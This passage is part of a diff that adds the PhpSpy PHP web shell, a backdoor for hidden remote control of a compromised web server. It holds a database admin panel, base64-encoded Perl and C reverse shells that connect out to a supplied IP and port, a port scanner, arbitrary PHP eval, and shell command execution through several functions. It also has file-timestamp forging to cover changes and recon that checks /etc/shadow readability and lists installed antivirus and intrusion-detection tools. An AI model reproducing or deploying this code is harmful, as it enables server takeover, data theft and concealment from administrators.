+						p('<td>'.($row['Packed'] === null ? 'No' : $row['Packed']).'&nbsp;</td>');
+						p('<td>'.$row['Seq_in_index'].'</td>');
+						p('<td>'.$row['Column_name'].($row['Sub_part'] ? '('.$row['Sub_part'].')' : '').'&nbsp;</td>');
+						p('<td>'.($row['Cardinality'] ? $row['Cardinality'] : 0).'&nbsp;</td>');
+						p('<td>'.$row['Collation'].'&nbsp;</td>');
+						p('<td>'.$row['Null'].'&nbsp;</td>');
+						p('<td>'.$row['Comment'].'&nbsp;</td>');
+						p('</tr>');
+					}
+					tbfoot();
+				} elseif ($doing == 'insert' || $doing == 'edit') {
+					$result = q('SHOW COLUMNS FROM '.$tablename);
+					while ($row = mysql_fetch_array($result)) {
+						$rowdb[] = $row;
+					}
+					$rs = array();
+					if ($doing == 'insert') {
+						p('<h2>Insert new line in '.$tablename.' table &raquo;</h2>');
+					} else {
+						p('<h2>Update record in '.$tablename.' table &raquo;</h2>');
+						$where = base64_decode($base64);
+						$result = q("SELECT * FROM $tablename WHERE $where LIMIT 1");
+						$rs = mysql_fetch_array($result);
+					}
+					p('<form method="post" action="'.$self.'">');
+					p($dbform);
+					makehide('action','mysqladmin');
+					makehide('tablename',$tablename);
+					p('<table border="0" cellpadding="3" cellspacing="0">');
+					foreach ($rowdb as $row) {
+						if ($rs[$row['Field']]) {
+							$value = htmlspecialchars($rs[$row['Field']]);
+						} else {
+							$value = '';
+						}
+						$thisbg = bg();
+						p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
+						if ($row['Key'] == 'UNI' || $row['Extra'] == 'auto_increment' || $row['Key'] == 'PRI') {
+							p('<td><b>'.$row['Field'].'</b><br />'.$row['Type'].'</td><td>'.$value.'&nbsp;</td></tr>');
+						} else {							
+							p('<td><b>'.$row['Field'].'</b><br />'.$row['Type'].'</td><td><textarea class="area" name="insertsql['.$row['Field'].']" style="width:500px;height:60px;overflow:auto;">'.$value.'</textarea></td></tr>');
+						}
+					}
+					if ($doing == 'insert') {
+						p('<tr class="'.bg().'"><td colspan="2"><input class="bt" type="submit" name="insert" value="Insert" /></td></tr>');
+					} else {
+						p('<tr class="'.bg().'"><td colspan="2"><input class="bt" type="submit" name="update" value="Update" /></td></tr>');
+						makehide('base64', $base64);
+					}
+					p('</table></form>');
+				} else {
+					$querys = @explode(';',$sql_query);
+					foreach($querys as $num=>$query) {
+						if ($query) {
+							p("<p><b>Query#{$num} : ".htmlspecialchars($query,ENT_QUOTES)."</b></p>");
+							switch(qy($query))
+							{
+								case 0:
+									p('<h2>Error : '.mysql_error().'</h2>');
+									break;	
+								case 1:
+									if (strtolower(substr($query,0,13)) == 'select * from') {
+										$allowedit = 1;
+									}
+									if ($getnumsql) {
+										$tatol = mysql_num_rows(q($getnumsql));
+										$multipage = multi($tatol, $pagenum, $page, $tablename);
+									}
+									if (!$tablename) {
+										$sql_line = str_replace(array("\r", "\n", "\t"), array(' ', ' ', ' '), trim(htmlspecialchars($query)));
+										$sql_line = preg_replace("/\/\*[^(\*\/)]*\*\//i", " ", $sql_line);
+										preg_match_all("/from\s+`{0,1}([\w]+)`{0,1}\s+/i",$sql_line,$matches);
+										$tablename = $matches[1][0];
+									}
+
+									/*********************/
+									$getfield = q("SHOW COLUMNS FROM $tablename");
+									$rowdb = array();
+									$keyfied = ''; //�����ֶ�
+									while($row = @mysql_fetch_assoc($getfield)) {
+										$rowdb[$row['Field']]['Key'] = $row['Key'];
+										$rowdb[$row['Field']]['Extra'] = $row['Extra'];
+										if ($row['Key'] == 'UNI' || $row['Key'] == 'PRI') {
+											$keyfied = $row['Field'];
+										}
+									}
+									/*********************/								
+									//ֱ�����������������������
+									if ($keyfied && strtolower(substr($query,0,13)) == 'select * from') {
+										$query = str_replace(" LIMIT ", " order by $keyfied DESC LIMIT ", $query);
+									}
+
+									$result = q($query);
+
+									p($multipage);
+									p('<table border="0" cellpadding="3" cellspacing="0">');
+									p('<tr class="head">');
+									if ($allowedit) p('<td>Action</td>');
+									$fieldnum = @mysql_num_fields($result);
+									for($i=0;$i<$fieldnum;$i++){
+										$name = @mysql_field_name($result, $i);
+										$type = @mysql_field_type($result, $i);
+										$len = @mysql_field_len($result, $i);
+										p("<td nowrap>$name<br><span>$type($len)".(($rowdb[$name]['Key'] == 'UNI' || $rowdb[$name]['Key'] == 'PRI') ? '<b> - PRIMARY</b>' : '').($rowdb[$name]['Extra'] == 'auto_increment' ? '<b> - Auto</b>' : '')."</span></td>");
+									}
+									p('</tr>');
+									
+									while($mn = @mysql_fetch_assoc($result)){
+										$thisbg = bg();
+										p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
+										$where = $tmp = $b1 = '';
+										//ѡȡ�����ֶ���
+										foreach($mn as $key=>$inside){
+											if ($inside) {
+												//����������Ψһ���ԡ��Զ����ӵ��ֶΣ��ҵ���ֹͣ��������������ֶ���Ϊ������
+												if ($rowdb[$key]['Key'] == 'UNI' || $rowdb[$key]['Extra'] == 'auto_increment' || $rowdb[$key]['Key'] == 'PRI') {
+													$where = $key."='".addslashes($inside)."'";
+													break;
+												}
+												$where .= $tmp.$key."='".addslashes($inside)."'";
+												$tmp = ' AND ';
+											}
+										}
+										//��ȡ��¼��
+										foreach($mn as $key=>$inside){
+											$b1 .= '<td nowrap>'.html_clean($inside).'&nbsp;</td>';
+										}
+										$where = base64_encode($where);
+
+										if ($allowedit) p('<td nowrap><a href="javascript:editrecord(\'edit\', \''.$where.'\', \''.$tablename.'\');">Edit</a> | <a href="javascript:editrecord(\'del\', \''.$where.'\', \''.$tablename.'\');">Del</a></td>');
+
+										p($b1);
+										p('</tr>');
+										unset($b1);
+									}
+									p('<tr class="head">');
+									if ($allowedit) p('<td>Action</td>');
+									$fieldnum = @mysql_num_fields($result);
+									for($i=0;$i<$fieldnum;$i++){
+										$name = @mysql_field_name($result, $i);
+										$type = @mysql_field_type($result, $i);
+										$len = @mysql_field_len($result, $i);
+										p("<td nowrap>$name<br><span>$type($len)".(($rowdb[$name]['Key'] == 'UNI' || $rowdb[$name]['Key'] == 'PRI') ? '<b> - PRIMARY</b>' : '').($rowdb[$name]['Extra'] == 'auto_increment' ? '<b> - Auto</b>' : '')."</span></td>");
+									}
+									p('</tr>');
+									tbfoot();
+									p($multipage);
+									break;
+								case 2:
+									$ar = mysql_affected_rows();
+									p('<h2>affected rows : <b>'.$ar.'</b></h2>');
+									break;
+							}
+						}
+					}
+				}
+			} else {
+				$query = q("SHOW TABLE STATUS");
+				$table_num = $table_rows = $data_size = 0;
+				$tabledb = array();
+				while($table = mysql_fetch_array($query)) {
+					$data_size = $data_size + $table['Data_length'];
+					$table_rows = $table_rows + $table['Rows'];
+					$table['Data_length'] = sizecount($table['Data_length']);
+					$table_num++;
+					$tabledb[] = $table;
+				}
+				$data_size = sizecount($data_size);
+				unset($table);
+				p('<table border="0" cellpadding="0" cellspacing="0">');
+				p('<form action="'.$self.'" method="POST">');
+				makehide('action','mysqladmin');
+				p($dbform);
+				p('<tr class="head">');
+				p('<td width="2%" align="center">&nbsp;</td>');
+				p('<td>Name</td>');
+				p('<td>Rows</td>');
+				p('<td>Data_length</td>');
+				p('<td>Create_time</td>');
+				p('<td>Update_time</td>');
+				if ($highver) {
+					p('<td>Engine</td>');
+					p('<td>Collation</td>');
+				}
+				p('<td>Operate</td>');
+				p('</tr>');
+				foreach ($tabledb as $key => $table) {
+					$thisbg = bg();
+					p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
+					p('<td align="center" width="2%"><input type="checkbox" name="table[]" value="'.$table['Name'].'" /></td>');
+					p('<td><a href="javascript:settable(\''.$table['Name'].'\');">'.$table['Name'].'</a></td>');
+					p('<td>'.$table['Rows'].'</td>');
+					p('<td>'.$table['Data_length'].'</td>');
+					p('<td>'.$table['Create_time'].'&nbsp;</td>');
+					p('<td>'.$table['Update_time'].'&nbsp;</td>');
+					if ($highver) {
+						p('<td>'.$table['Engine'].'</td>');
+						p('<td>'.$table['Collation'].'</td>');
+					}
+					p('<td><a href="javascript:settable(\''.$table['Name'].'\', \'insert\');">Insert</a> | <a href="javascript:settable(\''.$table['Name'].'\', \'structure\');">Structure</a> | <a href="javascript:settable(\''.$table['Name'].'\', \'drop\');">Drop</a></td>');
+					p('</tr>');
+				}
+				p('<tr class="head">');
+				p('<td width="2%" align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td>');
+				p('<td>Name</td>');
+				p('<td>Rows</td>');
+				p('<td>Data_length</td>');
+				p('<td>Create_time</td>');
+				p('<td>Update_time</td>');
+				if ($highver) {
+					p('<td>Engine</td>');
+					p('<td>Collation</td>');
+				}
+				p('<td>Operate</td>');
+				p('</tr>');
+				p('<tr class='.bg().'>');
+				p('<td>&nbsp;</td>');
+				p('<td>Total tables: '.$table_num.'</td>');
+				p('<td>'.$table_rows.'</td>');
+				p('<td>'.$data_size.'</td>');
+				p('<td colspan="'.($highver ? 5 : 3).'">&nbsp;</td>');
+				p('</tr>');
+
+				p("<tr class=\"".bg()."\"><td colspan=\"".($highver ? 9 : 7)."\"><input name=\"saveasfile\" value=\"1\" type=\"checkbox\" /> Save as file <input class=\"input\" name=\"path\" value=\"".SA_ROOT.$dbname.".sql\" type=\"text\" size=\"60\" /> <input class=\"bt\" type=\"submit\" value=\"Export selection table\" /></td></tr>");
+				makehide('doing','backupmysql');
+				formfoot();
+				p("</table>");
+				fr($query);
+			}
+		}
+	}
+	tbfoot();
+	@mysql_close();
+}//end mysql
+
+elseif ($action == 'backconnect') {
+	!$yourip && $yourip = $_SERVER['REMOTE_ADDR'];
+	!$yourport && $yourport = '12345';
+	$usedb = array('perl'=>'perl','c'=>'c');
+
+	$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
+		"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
+		"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
+		"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
+		"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
+		"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
+		"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
+	$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC".
+		"BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb".
+		"SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd".
+		"KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ".
+		"sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC".
+		"Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D".
+		"QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp".
+		"Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
+
+	if ($start && $yourip && $yourport && $use){
+		if ($use == 'perl') {
+			cf('/tmp/angel_bc',$back_connect);
+			$res = execute(which('perl')." /tmp/angel_bc $yourip $yourport &");
+		} else {
+			cf('/tmp/angel_bc.c',$back_connect_c);
+			$res = execute('gcc -o /tmp/angel_bc /tmp/angel_bc.c');
+			@unlink('/tmp/angel_bc.c');
+			$res = execute("/tmp/angel_bc $yourip $yourport &");
+		}
+		m("Now script try connect to $yourip port $yourport ...");
+	}
+
+	formhead(array('title'=>'Back Connect'));
+	makehide('action','backconnect');
+	p('<p>');
+	p('Your IP:');
+	makeinput(array('name'=>'yourip','size'=>20,'value'=>$yourip));
+	p('Your Port:');
+	makeinput(array('name'=>'yourport','size'=>15,'value'=>$yourport));
+	p('Use:');
+	makeselect(array('name'=>'use','option'=>$usedb,'selected'=>$use));
+	makeinput(array('name'=>'start','value'=>'Start','type'=>'submit','class'=>'bt'));
+	p('</p>');
+	formfoot();
+}//end
+
+elseif ($action == 'portscan') {
+	!$scanip && $scanip = '127.0.0.1';
+	!$scanport && $scanport = '21,25,80,110,135,139,445,1433,3306,3389,5631,43958';
+	formhead(array('title'=>'Port Scan'));
+	makehide('action','portscan');
+	p('<p>');
+	p('IP:');
+	makeinput(array('name'=>'scanip','size'=>20,'value'=>$scanip));
+	p('Port:');
+	makeinput(array('name'=>'scanport','size'=>80,'value'=>$scanport));
+	makeinput(array('name'=>'startscan','value'=>'Scan','type'=>'submit','class'=>'bt'));
+	p('</p>');
+	formfoot();
+
+	if ($startscan) {
+		p('<h2>Result &raquo;</h2>');
+		p('<ul class="info">');
+		foreach(explode(',', $scanport) as $port) {
+			$fp = @fsockopen($scanip, $port, &$errno, &$errstr, 1); 
+			if (!$fp) {
+				p('<li>'.$scanip.':'.$port.' ------------------------ <span style="font-weight:bold;color:#f00;">Close</span></li>');
+		   } else {
+				p('<li>'.$scanip.':'.$port.' ------------------------ <span style="font-weight:bold;color:#080;">Open</span></li>');
+				@fclose($fp);
+		   } 
+		}
+		p('</ul>');
+	}
+}
+
+elseif ($action == 'eval') {
+	$phpcode = trim($phpcode);
+	if($phpcode){
+		if (!preg_match('#<\?#si', $phpcode)) {
+			$phpcode = "<?php\n\n{$phpcode}\n\n?>";
+		}
+		eval("?".">$phpcode<?");
+	}
+	formhead(array('title'=>'Eval PHP Code'));
+	makehide('action','eval');
+	maketext(array('title'=>'PHP Code','name'=>'phpcode', 'value'=>$phpcode));
+	p('<p><a href="http://w'.'ww.4ng'.'el.net/php'.'spy/pl'.'ugin/" target="_blank">Get plugins</a></p>');
+	formfooter();
+}//end eval
+
+elseif ($action == 'editfile') {
+	if(file_exists($opfile)) {
+		$fp=@fopen($opfile,'r');
+		$contents=@fread($fp, filesize($opfile));
+		@fclose($fp);
+		$contents=htmlspecialchars($contents);
+	}
+	formhead(array('title'=>'Create / Edit File'));
+	makehide('action','file');
+	makehide('dir',$nowpath);
+	makeinput(array('title'=>'Current File (import new file name and new file)','name'=>'editfilename','value'=>$opfile,'newline'=>1));
+	maketext(array('title'=>'File Content','name'=>'filecontent','value'=>$contents));
+	formfooter();
+	
+	goback();
+
+}//end editfile
+
+elseif ($action == 'newtime') {
+	$opfilemtime = @filemtime($opfile);
+	//$time = strtotime("$year-$month-$day $hour:$minute:$second");
+	$cachemonth = array('January'=>1,'February'=>2,'March'=>3,'April'=>4,'May'=>5,'June'=>6,'July'=>7,'August'=>8,'September'=>9,'October'=>10,'November'=>11,'December'=>12);
+	formhead(array('title'=>'Clone folder/file was last modified time'));
+	makehide('action','file');
+	makehide('dir',$nowpath);
+	makeinput(array('title'=>'Alter folder/file','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1));
+	makeinput(array('title'=>'Reference folder/file (fullpath)','name'=>'tarfile','size'=>120,'newline'=>1));
+	formfooter();
+	formhead(array('title'=>'Set last modified'));
+	makehide('action','file');
+	makehide('dir',$nowpath);
+	makeinput(array('title'=>'Current folder/file (fullpath)','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1));
+	p('<p>year:');
+	makeinput(array('name'=>'year','value'=>date('Y',$opfilemtime),'size'=>4));
+	p('month:');
+	makeinput(array('name'=>'month','value'=>date('m',$opfilemtime),'size'=>2));
+	p('day:');
+	makeinput(array('name'=>'day','value'=>date('d',$opfilemtime),'size'=>2));
+	p('hour:');
+	makeinput(array('name'=>'hour','value'=>date('H',$opfilemtime),'size'=>2));
+	p('minute:');
+	makeinput(array('name'=>'minute','value'=>date('i',$opfilemtime),'size'=>2));
+	p('second:');
+	makeinput(array('name'=>'second','value'=>date('s',$opfilemtime),'size'=>2));
+	p('</p>');
+	formfooter();
+	goback();
+}//end newtime
+
+elseif ($action == 'shell') {
+	if (IS_WIN && IS_COM) {
+		if($program && $parameter) {
+			$shell= new COM('Shell.Application');
+			$a = $shell->ShellExecute($program,$parameter);
+			m('Program run has '.(!$a ? 'success' : 'fail'));
+		}
+		!$program && $program = 'c:\windows\system32\cmd.exe';
+		!$parameter && $parameter = '/c net start > '.SA_ROOT.'log.txt';
+		formhead(array('title'=>'Execute Program'));
+		makehide('action','shell');
+		makeinput(array('title'=>'Program','name'=>'program','value'=>$program,'newline'=>1));
+		p('<p>');
+		makeinput(array('title'=>'Parameter','name'=>'parameter','value'=>$parameter));
+		makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute'));
+		p('</p>');
+		formfoot();
+	}
+	formhead(array('title'=>'Execute Command'));
+	makehide('action','shell');
+	if (IS_WIN && IS_COM) {
+		$execfuncdb = array('phpfunc'=>'phpfunc','wscript'=>'wscript','proc_open'=>'proc_open');
+		makeselect(array('title'=>'Use:','name'=>'execfunc','option'=>$execfuncdb,'selected'=>$execfunc,'newline'=>1));
+	}
+	p('<p>');
+	makeinput(array('title'=>'Command','name'=>'command','value'=>htmlspecialchars($command)));
+	makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute'));
+	p('</p>');
+	formfoot();
+
+	if ($command) {
+		p('<hr width="100%" noshade /><pre>');
+		if ($execfunc=='wscript' && IS_WIN && IS_COM) {
+			$wsh = new COM('WScript.shell');
+			$exec = $wsh->exec('cmd.exe /c '.$command);
+			$stdout = $exec->StdOut();
+			$stroutput = $stdout->ReadAll();
+			echo $stroutput;
+		} elseif ($execfunc=='proc_open' && IS_WIN && IS_COM) {
+			$descriptorspec = array(
+			   0 => array('pipe', 'r'),
+			   1 => array('pipe', 'w'),
+			   2 => array('pipe', 'w')
+			);
+			$process = proc_open($_SERVER['COMSPEC'], $descriptorspec, $pipes);
+			if (is_resource($process)) {
+				fwrite($pipes[0], $command."\r\n");
+				fwrite($pipes[0], "exit\r\n");
+				fclose($pipes[0]);
+				while (!feof($pipes[1])) {
+					echo fgets($pipes[1], 1024);
+				}
+				fclose($pipes[1]);
+				while (!feof($pipes[2])) {
+					echo fgets($pipes[2], 1024);
+				}
+				fclose($pipes[2]);
+				proc_close($process);
+			}
+		} else {
+			echo(execute($command));
+		}
+		p('</pre>');
+	}
+}//end shell
+
+elseif ($action == 'phpenv') {
+	$upsize=getcfg('file_uploads') ? getcfg('upload_max_filesize') : 'Not allowed';
+	$adminmail=isset($_SERVER['SERVER_ADMIN']) ? $_SERVER['SERVER_ADMIN'] : getcfg('sendmail_from');
+	!$dis_func && $dis_func = 'No';	
+	$info = array(
+		1 => array('Server Time',date('Y/m/d h:i:s',$timestamp)),
+		2 => array('Server Domain',$_SERVER['SERVER_NAME']),
+		3 => array('Server IP',gethostbyname($_SERVER['SERVER_NAME'])),
+		4 => array('Server OS',PHP_OS),
+		5 => array('Server OS Charset',$_SERVER['HTTP_ACCEPT_LANGUAGE']),
+		6 => array('Server Software',$_SERVER['SERVER_SOFTWARE']),
+		7 => array('Server Web Port',$_SERVER['SERVER_PORT']),
+		8 => array('PHP run mode',strtoupper(php_sapi_name())),
+		9 => array('The file path',__FILE__),
+
+		10 => array('PHP Version',PHP_VERSION),
+		11 => array('PHPINFO',(IS_PHPINFO ? '<a href="javascript:g(\'phpinfo\');">Yes</a>' : 'No')),
+		12 => array('Safe Mode',getcfg('safe_mode')),
+		13 => array('Administrator',$adminmail),
+		14 => array('allow_url_fopen',getcfg('allow_url_fopen')),
+		15 => array('enable_dl',getcfg('enable_dl')),
+		16 => array('display_errors',getcfg('display_errors')),
+		17 => array('register_globals',getcfg('register_globals')),
+		18 => array('magic_quotes_gpc',getcfg('magic_quotes_gpc')),
+		19 => array('memory_limit',getcfg('memory_limit')),
+		20 => array('post_max_size',getcfg('post_max_size')),
+		21 => array('upload_max_filesize',$upsize),
+		22 => array('max_execution_time',getcfg('max_execution_time').' second(s)'),
+		23 => array('disable_functions',$dis_func),
+	);
+
+	if($phpvarname) {
+		m($phpvarname .' : '.getcfg($phpvarname));
+	}
+
+	formhead(array('title'=>'Server environment'));
+	makehide('action','phpenv');
+	makeinput(array('title'=>'Please input PHP configuration parameter(eg:magic_quotes_gpc)','name'=>'phpvarname','value'=>$phpvarname,'newline'=>1));
+	formfooter();
+
+	$hp = array(0=> 'Server', 1=> 'PHP');
+	for($a=0;$a<2;$a++) {
+		p('<h2>'.$hp[$a].' &raquo;</h2>');
+		p('<ul class="info">');
+		if ($a==0) {
+			for($i=1;$i<=9;$i++) {
+				p('<li><u>'.$info[$i][0].':</u>'.$info[$i][1].'</li>');
+			}
+		} elseif ($a == 1) {
+			for($i=10;$i<=23;$i++) {
+				p('<li><u>'.$info[$i][0].':</u>'.$info[$i][1].'</li>');
+			}
+		}
+		p('</ul>');
+	}
+}//end phpenv
+
+elseif ($action == 'secinfo') {
+	
+	secparam('Server software', @getenv('SERVER_SOFTWARE'));
+	secparam('Disabled PHP Functions', ($GLOBALS['disable_functions'])?$GLOBALS['disable_functions']:'none');
+	secparam('Open base dir', @ini_get('open_basedir'));
+	secparam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
+	secparam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
+	secparam('cURL support', function_exists('curl_version')?'enabled':'no');
+	$temp=array();
+	if(function_exists('mysql_get_client_info'))
+		$temp[] = "MySql (".mysql_get_client_info().")";
+	if(function_exists('mssql_connect'))
+		$temp[] = "MSSQL";
+	if(function_exists('pg_connect'))
+		$temp[] = "PostgreSQL";
+	if(function_exists('oci_connect'))
+		$temp[] = "Oracle";
+	secparam('Supported databases', implode(', ', $temp));
+	
+	if( !IS_WIN ) {
+		$userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
+		$danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
+		$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
+		secparam('Readable /etc/passwd', @is_readable('/etc/passwd') ? "yes" : 'no');
+		secparam('Readable /etc/shadow', @is_readable('/etc/shadow') ? "yes" : 'no');
+		secparam('OS version', @file_get_contents('/proc/version'));
+		secparam('Distr name', @file_get_contents('/etc/issue.net'));
+		$safe_mode = @ini_get('safe_mode');
+		if(!$GLOBALS['safe_mode']) {
+			$temp=array();
+			foreach ($userful as $item)
+				if(which($item)){$temp[]=$item;}
+			secparam('Userful', implode(', ',$temp));
+			$temp=array();
+			foreach ($danger as $item)
+				if(which($item)){$temp[]=$item;}
+			secparam('Danger', implode(', ',$temp));
+			$temp=array();
+			foreach ($downloaders as $item) 
+				if(which($item)){$temp[]=$item;}
+			secparam('Downloaders', implode(', ',$temp));
+			secparam('Hosts', @file_get_contents('/etc/hosts'));
+			secparam('HDD space', execute('df -h'));
+			secparam('Mount options', @file_get_contents('/etc/fstab'));
+		}
+	} else {
+		secparam('OS Version',execute('ver'));
+		secparam('Account Settings',execute('net accounts'));
+		secparam('User Accounts',execute('net user'));
+		secparam('IP Configurate',execute('ipconfig -all'));
+	}
+}//end
+
+else {
+	m('Undefined Action');
+}
+
+?>
+</td></tr></table>
+<div style="padding:10px;border-bottom:1px solid #fff;border-top:1px solid #ddd;background:#eee;">
+	<span style="float:right;"><?php debuginfo();ob_end_flush();?></span>
+	Powered by <a title="Build 20110419" href="http://t.qq.com/injecting" target="_blank"><?php echo str_replace('.','','P.h.p.S.p.y');?> 2011</a>. Copyright (C) 2012 <a href="http://t.qq.com/injecting" target="_blank">����̿�</a> All Rights Reserved.
+</div>
+</body>
+</html>
+
+<?php
+
+/*======================================================
+������
+======================================================*/
+
+function secparam($n, $v) {
+	$v = trim($v);
+	if($v) {
+		p('<h2>'.$n.' &raquo;</h2>');
+		p('<div class="infolist">');
+		if(strpos($v, "\n") === false)
+			p($v.'<br />');
+		else
+			p('<pre>'.$v.'</pre>');
+		p('</div>');
+	}
+}
+function m($msg) {
+	echo '<div style="margin:10px auto 15px auto;background:#ffffe0;border:1px solid #e6db55;padding:10px;font:14px;text-align:center;font-weight:bold;">';
+	echo $msg;
+	echo '</div>';
+}
+function scookie($key, $value, $life = 0, $prefix = 1) {
+	global $timestamp, $_SERVER, $cookiepre, $cookiedomain, $cookiepath, $cookielife;
+	$key = ($prefix ? $cookiepre : '').$key;
+	$life = $life ? $life : $cookielife;
+	$useport = $_SERVER['SERVER_PORT'] == 443 ? 1 : 0;
+	setcookie($key, $value, $timestamp+$life, $cookiepath, $cookiedomain, $useport);
+}	
+function multi($num, $perpage, $curpage, $tablename) {
+	$multipage = '';
+	if($num > $perpage) {
+		$page = 10;
+		$offset = 5;
+		$pages = @ceil($num / $perpage);
+		if($page > $pages) {
+			$from = 1;
+			$to = $pages;
+		} else {
+			$from = $curpage - $offset;
+			$to = $curpage + $page - $offset - 1;
+			if($from < 1) {
+				$to = $curpage + 1 - $from;
+				$from = 1;
+				if(($to - $from) < $page && ($to - $from) < $pages) {
+					$to = $page;
+				}
+			} elseif($to > $pages) {
+				$from = $curpage - $pages + $to;
+				$to = $pages;
+				if(($to - $from) < $page && ($to - $from) < $pages) {
+					$from = $pages - $page + 1;
+				}
+			}
+		}
+		$multipage = ($curpage - $offset > 1 && $pages > $page ? '<a href="javascript:settable(\''.$tablename.'\', \'\', 1);">First</a> ' : '').($curpage > 1 ? '<a href="javascript:settable(\''.$tablename.'\', \'\', '.($curpage - 1).');">Prev</a> ' : '');
+		for($i = $from; $i <= $to; $i++) {
+			$multipage .= $i == $curpage ? $i.' ' : '<a href="javascript:settable(\''.$tablename.'\', \'\', '.$i.');">['.$i.']</a> ';
+		}
+		$multipage .= ($curpage < $pages ? '<a href="javascript:settable(\''.$tablename.'\', \'\', '.($curpage + 1).');">Next</a>' : '').($to < $pages ? ' <a href="javascript:settable(\''.$tablename.'\', \'\', '.$pages.');">Last</a>' : '');
+		$multipage = $multipage ? '<p>Pages: '.$multipage.'</p>' : '';
+	}
+	return $multipage;
+}
+// ��½���
+function loginpage() {
+?>
+	<style type="text/css">
+	input {font:11px Verdana;BACKGROUND: #FFFFFF;height: 18px;border: 1px solid #666666;}
+	</style>
+	<form method="POST" action="">
+	<span style="font:11px Verdana;">Password: </span><input name="password" type="password" size="20">
+	<input type="hidden" name="action" value="login">
+	<input type="submit" value="Login">
+	</form>
+<?php
+	exit;
+}//end loginpage()
+
+function execute($cfe) {
+	$res = '';
+	if ($cfe) {
+		if(function_exists('system')) {
+			@ob_start();
+			@system($cfe);
+			$res = @ob_get_contents();
+			@ob_end_clean();
+		} elseif(function_exists('passthru')) {
+			@ob_start();
+			@passthru($cfe);
+			$res = @ob_get_contents();
+			@ob_end_clean();
+		} elseif(function_exists('shell_exec')) {
+			$res = @shell_exec($cfe);
+		} elseif(function_exists('exec')) {
+			@exec($cfe,$res);
+			$res = join("\n",$res);
+		} elseif(@is_resource($f = @popen($cfe,"r"))) {
+			$res = '';
+			while(!@feof($f)) {
+				$res .= @fread($f,1024); 
+			}
+			@pclose($f);
+		}
+	}
+	return $res;
+}
+function which($pr) {
+	$path = execute("which $pr");
+	return ($path ? $path : $pr); 
+}
+
+function cf($fname,$text){
+	if($fp=@fopen($fname,'w')) {
+		@fputs($fp,@base64_decode($text));
+		@fclose($fp);
+	}
+}
+function dirsize($dir) { 
+	$dh = @opendir($dir);
+	$size = 0;
+	while($file = @readdir($dh)) {
+		if ($file != '.' && $file != '..') {
+			$path = $dir.'/'.$file;
+			$size += @is_dir($path) ? dirsize($path) : @filesize($path);
+		}
+	}
+	@closedir($dh);
+	return $size;
+}
+// ҳ�������Ϣ
+function debuginfo() {
+	global $starttime;
+	$mtime = explode(' ', microtime());
+	$totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6);
